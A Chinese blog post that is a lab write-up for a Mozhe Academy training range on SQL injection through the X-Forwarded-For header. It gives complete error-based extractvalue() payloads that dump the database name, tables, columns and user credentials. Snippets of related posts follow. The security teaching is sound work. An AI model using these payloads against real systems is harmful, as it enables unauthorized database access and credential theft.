墨者学院-X-Forwarded-For注入漏洞实战

最新推荐文章于 2024-04-15 00:43:03 发布
最新推荐文章于 2024-04-15 00:43:03 发布
阅读量405 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_38131137/article/details/104622089
版权

这题怎么说呢,网上普遍的做法是当成xff来做,sqlmap直接爆破,这种方式还没有去尝试,但是难度不大,这里主要讲手工注入,对于sqlmap爆破的先不进行尝试。

开始注入:

一、审题

这题从题目,也可以看放包后的回显可以知道是http头的ip注入,尝试(题目有说)x-forwarded-for(这里的注入我很难主动想到,因为在原始的http头里没有x-forwarded-for,这题是题目有提醒)

二、判断类型

这里有1=1和1=2明确可以知道不是数字型注入
由此采用字符型注入
127.0.0.1’ and ‘1’='1

三、进行函数选择

这题用报错函数extratctvalue
直接开始注入

127.0.0.1’ and extractvalue(null,concat(0x74,(select database()),0x7e)) and ‘1’='1进行database()报错输入
在这里插入图片描述

四、爆表(table)

127.0.0.1’ and extractvalue(null,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘webcalendar’),0x7e)) and ‘1’='1

五、爆列(columns)

127.0.0.1’ and extractvalue(null,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=‘webcalendar’ and table_name=‘user’),0x7e)) and ‘1’='1
在这里插入图片描述

六、爆字段

127.0.0.1’ and extractvalue(null,concat(0x7e,(select group_concat(username,password)from user ),0x7e)) and ‘1’='1
在这里插入图片描述账号密码就出来了

weixin_38131137
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
墨者学院-HTTP头注入漏洞测试(X-Forwarded-for)-手工注入
mutou990的博客
08-03 1540
一、审题 这题从题目,也可以看放包后的回显可以知道是http头的ip注入,尝试(题目有说)x-forwarded-for(这里的注入我很难主动想到,因为在原始的http头里没有x-forwarded-for,这题是题目有提醒) 二、判断类型 使用brupsuit抓包,repeater后添XFF头 ——X-Forwarded-For: 通过修改X-Forwarded-For:值来找出注入点。 当值为"(双引号)时,X-Forwarded-For:" 不报错; 当值为‘’(单引号)时,X-Forwarded
Web应用程序漏洞-X-Forwarded-For注入
旺仔Sec&blog
07-20 2760
第二十八步,重新审阅刚刚获取os-shell时的日志,发现sqlmap在网站根目录下放置了一个tmpunjoh.php文件(文件名为随机,请注意),可以用于手动上传文件。可以看到,我们从X-Forwarded-For定义的内容,未经过筛选就执行了SQL语句用于查询该IP地址是否在白名单之内,且。第五步,一分钟后扫描结束,切换至Results标签页,可以看到/admin目录被扫描出来,推测该目录为管理员后台地址。第十六步,在BurpSuite中将X-Forwarded-For的值改为一个单引号(’)尝试。
墨者-X-Forwarded-For注入漏洞-题解
Redredredfish的博客
12-13 3394
靶场地址:https://www.mozhe.cn/bug/detail/QWxmdFFhVURDay90L0wxdmJXSkl5Zz09bW96aGUmozhe ①首先需要知道什么是X-Forwarded-For(简称XFF) X-Forwarded-For是一个http扩展头部,用于表示http端请求真实ip。 X-Forwarded-For: client, proxy1, proxy2 client表示客户端真实ip,proxy表示服务端到客户端多级代理 通过XFF服务端可以知道客户端的真实ip ②
渗透测试-XFF漏洞攻击原理及防御方案
lza20001103的博客
04-15 2342
渗透测试-XFF漏洞攻击原理及防御方案
request.getHeader(“x-forwarded-for“)一直返回127.0.0.1
人生最遗憾的莫过于:轻易地放弃了不该放弃的,固执地坚持了不该坚持的
11-09 1378
使用 request.getRemoteAddr 获取客户端 ip ,返回结果始终为127.0.0.1。原因是服务器使用了nginx反向代理。 在nginx配置文件nginx.conf中添 proxy_set_header x-forwarded-for $remote_addr; 如下所示:
X-Forwarded-For绕过服务器IP地址过滤
热门推荐
公众号shadow sock7
06-03 1万+
参考: http://www.jianshu.com/p/98c08956183d https://github.com/bl4de/ctf/blob/master/2017/nullcon_HackIM_2017/Web1.md看到一个CTF题中有一个与X-Forwarded-For有关的。 通过在HTTP头中设置X-Forwarded-For: 127.0.0.1在正常的TCP 通信中,是
x-forwarded-for手工注入(超详细)
1
05-12 1098
使用靶场来进行演示。 访问靶场后看到的是一个常见的后台的登录框,第一步肯定是先试一下看看有没有弱口令咯,试了几个发现并不存在弱口令,但是发现网站有一串乱码的弹窗如下 虽然是乱码,但是看到里面有ip,头发短见识多得我就想到了这大概率是记录下了我本机的ip(这里的ip是开了隧道的不是我的哦~)让我们来抓包看一下 这里可以看到转编码之后确实是记录了我的ip,但是在请求包中没有发现xff头,就很奇怪,自己上。 发现xff头的内容是可以随便控制的,下面可以看到输入单引号是报错的,那就直接尝...
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)
最新发布
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1题)、PHP代码分析溯源(第2题)、PHP逻辑漏洞利用实战(第1题)、SQL手工注入漏洞测试(Access数据库)
APP原型实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
0080 APP原型实例:墨者科技-旅行小蜜APP2.0.rp
01-06
rp原型源文件
墨者安全软件-免费杀毒软件
11-11
墨者安全专家是一款永久免费的免疫型安全防护软件,集墨者独创的 “革离术”、终身免费杀毒、修复系统漏洞、上网痕迹清理、网络防火墙、系统实时保护、安全互助社区等强大功能于一身。特别是独创的“革离术”,利用...
墨者有巨子腹-居秦阅读答案】墨者有巨子腹.docx
11-13
墨者有巨子腹-居秦阅读答案】墨者有巨子腹.docx
request.getHeader("X-Forwarded-For")总是返回127.0.0.1
johnhuster的专栏
04-21 4209
request.getHeader("X-Forwarded-For")总是返回127.0.0.1
记一次微信H5支付失败(网络环境未能通过安全验证,请稍后再试)解决方案
u012028371的博客
06-14 4576
产品过来反馈,在调起微信支付时,报以下错误,上网搜了下,好像是IP不一致导致的,解决方案如下: -------------------------------------------------- 官方解释: 首先我们要分清spbill_create_ip参数是干嘛的? ---------spbill_create_ip指的是终端ip,在APP和网页支付提交用户端ip,Nati...
X-Forwarded-For 学习
weixin_43460822的博客
09-17 869
** 定义 ** X-Forwarded-For(XFF)是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段。 ** 格式编辑 ** 这一HTTP头一般格式如下: X-Forwarded-For: client1, proxy1, proxy2, proxy3 其中的值通过一个 逗号+空格 把多个IP地址区分开, 最左边(client1)是最原始...
墨者学院】X-Forwarded-For注入漏洞实战
hehigoxqc606的博客
08-31 875
墨者学院】X-Forwarded-For注入漏洞实战 漏洞原理: 利用HTTP头部注入、sqlmap注入等方式,爆破数据库表中的用户账号和密码,以登陆系统,很有可能对系统有下一步的破坏。 实战过程: 第一步:访问链接 第二步:抓取数据包,可以看到登陆失败,并提示登陆的IP地址 第三步:利用X-Forwarded-For头伪装127.0.0.1进行测试 第四步:复制RAW文件到xff.txt中,这里构造的X-Forward...
墨者学院sql注入 x-f
07-27
墨者学院SQL注入是一种常见的Web应用程序安全漏洞,攻击者通过在输入字段中插入恶意的SQL代码来实现对数据库的非授权访问。X-F是HTTP请求头部的一个字段,通常用于传递客户端IP地址或其他相关信息。在某些情况下,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值